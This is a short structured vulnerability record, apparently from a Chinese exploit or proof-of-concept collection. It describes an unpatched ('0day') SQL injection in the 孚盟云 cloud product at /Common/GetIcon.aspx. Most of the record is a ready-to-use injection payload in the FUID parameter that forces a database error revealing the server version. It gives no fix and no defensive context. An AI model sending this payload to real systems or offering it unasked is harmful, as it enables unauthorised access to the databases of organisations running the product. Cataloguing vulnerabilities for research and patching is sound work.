vendor = "孚盟云"
name = "孚盟云 GetIcon.aspx SQL 注入"
type = "SQL注入"
version = "未知"
path = "/Common/GetIcon.aspx"
detail = "/Common/GetIcon.aspx?FUID=-1'and+1=@@VERSION--"
fix = "未知"
date = "0712"
label = "0day"
verifier = "sxf"
